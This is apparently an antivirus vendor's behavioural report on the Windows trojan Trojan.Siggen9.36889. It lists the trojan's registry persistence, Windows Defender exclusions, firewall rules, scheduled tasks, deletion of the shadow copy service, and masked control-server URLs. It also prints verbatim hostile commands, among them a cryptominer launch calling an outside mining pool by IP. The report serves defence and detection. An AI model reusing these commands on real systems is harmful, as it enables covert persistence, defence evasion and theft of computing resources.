Trojan.Siggen9.36889

Technical Information

To ensure autorun and distribution

Modifies the following registry keys

[<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Realtek HD Audio' = '%PROGRAMDATA%\RealtekHD\taskhostw.exe'

Creates or modifies the following files

<SYSTEM32>\tasks\microsoft\windows\wininet\systemc
<SYSTEM32>\tasks\microsoft\windows\wininet\cleaner

Malicious functions

To complicate detection of its presence in the operating system,

forces the system hide from view:

hidden files

blocks the following features:

User Account Control (UAC)

modifies the following system settings:

[<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'DisallowRun' = '00000001'

adds antivirus exclusion with following registry keys:

[<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%' = 'System'
[<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%' = 'System'
[<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '<SYSTEM32>' = 'SystemHD'
[<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '<SYSTEM32>' = 'SystemHD'

Executes the following

'%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="%PROGRAMDATA%\WindowsTask\MicrosoftHost.exe" enable=yes
'%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="%PROGRAMDATA%\WindowsTask\AppModule.exe" enable=yes
'%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Security Service" dir=in action=allow program="%PROGRAMDATA%\WindowsTask\AMD.exe" enable=yes
'%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="%PROGRAMDATA%\WindowsTask\MicrosoftHost.exe" enable=yes
'%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="%PROGRAMDATA%\WindowsTask\AppModule.exe" enable=yes
'%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Security Services" dir=out action=allow program="%PROGRAMDATA%\WindowsTask\AMD.exe" enable=yes
'%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
'%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
'%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
'%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out

Modifies file system

Creates the following files

%TEMP%\aute348.tmp
%APPDATA%\microsoft\windows\cookies\low\index.dat
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\bs5gagvm\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\1384m7s5\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\knskqhy4\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\7x0szqab\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\index.dat
%LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\desktop.ini
%LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\index.dat
%LOCALAPPDATA%\microsoft\windows\history\low\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\desktop.ini
%PROGRAMDATA%\windowstask\4
%PROGRAMDATA%\windowstask\winlogon.exe
%TEMP%\aut21f7.tmp
%PROGRAMDATA%\windowstask\opencl.dll
%TEMP%\aute55d.tmp
%PROGRAMDATA%\realtekhd\taskhostw.exe
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\desktop.ini
%PROGRAMDATA%\windowstask\microsofthost.exe

Sets the 'hidden' attribute to the following files

%PROGRAMDATA%\windowstask\opencl.dll
%PROGRAMDATA%\realtekhd\taskhostw.exe
%PROGRAMDATA%\windowstask\winlogon.exe
%PROGRAMDATA%\windowstask\4
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\7x0szqab\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\knskqhy4\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\1384m7s5\desktop.ini
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\bs5gagvm\desktop.ini
%LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\desktop.ini
%LOCALAPPDATA%\microsoft\windows\history\low\desktop.ini
%PROGRAMDATA%\windowstask\microsofthost.exe

Deletes the following files

%TEMP%\aute348.tmp
%TEMP%\aute55d.tmp
%TEMP%\aut21f7.tmp
<SYSTEM32>\tasks\adobe acrobat update task
%WINDIR%\tasks\adobe flash player updater.job
<SYSTEM32>\tasks\adobe flash player updater
<SYSTEM32>\tasks\officesoftwareprotectionplatform\svcrestarttask

Substitutes the following files

%PROGRAMDATA%\ntuser.pol
%HOMEPATH%\ntuser.pol

Network activity

TCP

HTTP GET requests

http://ne####txrand.com/randomnan/STATUS.html
http://ne####txrand.com/randomnan/loaderTOP.html
http://ne####txrand.com/randomnan/Login.html
http://ne####txrand.com/randomnan/Password.html
http://ne####txrand.com/randomnan/Server.html
http://ne####txrand.com/randomnan/configCPUX.html

'21#.#47.169.33':21

'45.#45.0.26':6262

UDP

DNS ASK ne####txrand.com

Miscellaneous

Creates and executes the following

'%PROGRAMDATA%\realtekhd\taskhostw.exe'
'%PROGRAMDATA%\windowstask\winlogon.exe'
'%PROGRAMDATA%\windowstask\microsofthost.exe' -o stratum+tcp://45.145.0.26:6262 -u Toprig --donate-level=1 -k -t1
'%WINDIR%\syswow64\cmd.exe' /C schtasks /Delete /TN "OfficeSoftwareProtectionPlatform\SvcRestartTask" /F' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C schtasks /Delete /TN "Adobe Flash Player Updater" /F' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C schtasks /Delete /TN "Adobe Acrobat Update Task" /F' (with hidden window)
'%PROGRAMDATA%\realtekhd\taskhostw.exe' ' (with hidden window)
'<SYSTEM32>\cmd.exe' /c gpupdate /force' (with hidden window)
'<SYSTEM32>\cmd.exe' /c ipconfig /flushdns' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C schtasks /query /fo list' (with hidden window)
'%WINDIR%\syswow64\schtasks.exe' /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "%PROGRAMDATA%\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST' (with hidden window)
'%WINDIR%\syswow64\schtasks.exe' /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "%PROGRAMDATA%\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c sc delete swprv' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="%PROGRAMDATA%\WindowsTask\AMD.exe" enable=yes' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="%PROGRAMDATA%\WindowsTask\AppModule.exe" enable=yes' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="%PROGRAMDATA%\WindowsTask\MicrosoftHost.exe" enable=yes' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="%PROGRAMDATA%\WindowsTask\AMD.exe" enable=yes' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="%PROGRAMDATA%\WindowsTask\AppModule.exe" enable=yes' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="%PROGRAMDATA%\WindowsTask\MicrosoftHost.exe" enable=yes' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall set allprofiles state on' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out' (with hidden window)
'%PROGRAMDATA%\windowstask\microsofthost.exe' -o stratum+tcp://45.145.0.26:6262 -u Toprig --donate-level=1 -k -t1' (with hidden window)

Executes the following

'%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall set allprofiles state on
'%WINDIR%\syswow64\schtasks.exe' /Delete /TN "Adobe Acrobat Update Task" /F
'%WINDIR%\syswow64\cmd.exe' /C schtasks /Delete /TN "OfficeSoftwareProtectionPlatform\SvcRestartTask" /F
'%WINDIR%\syswow64\cmd.exe' /C schtasks /Delete /TN "Adobe Flash Player Updater" /F
'%WINDIR%\syswow64\cmd.exe' /C schtasks /Delete /TN "Adobe Acrobat Update Task" /F
'<SYSTEM32>\raserver.exe' /offerraupdate
'<SYSTEM32>\gpscript.exe' /RefreshSystemParam
'<SYSTEM32>\rundll32.exe' "<SYSTEM32>\WININET.dll",DispatchAPICall 1
'<SYSTEM32>\gpupdate.exe' /force
'<SYSTEM32>\ipconfig.exe' /flushdns
'<SYSTEM32>\taskeng.exe' {B6D82A3D-8CE8-4C85-9931-C23505FD530B} S-1-5-21-1960123792-2022915161-3775307078-1001:uipfwrrkjs\user:Interactive:[1]
'<SYSTEM32>\cmd.exe' /c gpupdate /force
'<SYSTEM32>\cmd.exe' /c ipconfig /flushdns
'%WINDIR%\syswow64\schtasks.exe' /query /fo list
'%WINDIR%\syswow64\cmd.exe' /C schtasks /query /fo list
'%WINDIR%\syswow64\sc.exe' delete swprv
'%WINDIR%\syswow64\schtasks.exe' /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "%PROGRAMDATA%\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
'%WINDIR%\syswow64\netsh.exe' advfirewall set allprofiles state on
'%WINDIR%\syswow64\schtasks.exe' /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "%PROGRAMDATA%\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
'%WINDIR%\syswow64\cmd.exe' /c sc delete swprv
'%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
'%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
'%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
'%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
'%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="%PROGRAMDATA%\WindowsTask\AMD.exe" enable=yes
'%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="%PROGRAMDATA%\WindowsTask\AppModule.exe" enable=yes
'%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="%PROGRAMDATA%\WindowsTask\MicrosoftHost.exe" enable=yes
'%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="%PROGRAMDATA%\WindowsTask\AMD.exe" enable=yes
'%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="%PROGRAMDATA%\WindowsTask\AppModule.exe" enable=yes
'%WINDIR%\syswow64\cmd.exe' /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="%PROGRAMDATA%\WindowsTask\MicrosoftHost.exe" enable=yes
'%WINDIR%\syswow64\schtasks.exe' /Delete /TN "Adobe Flash Player Updater" /F
'%WINDIR%\syswow64\schtasks.exe' /Delete /TN "OfficeSoftwareProtectionPlatform\SvcRestartTask" /F

技术

术语

教育培训

误区

Technical Information

Curing recommendations

Free trial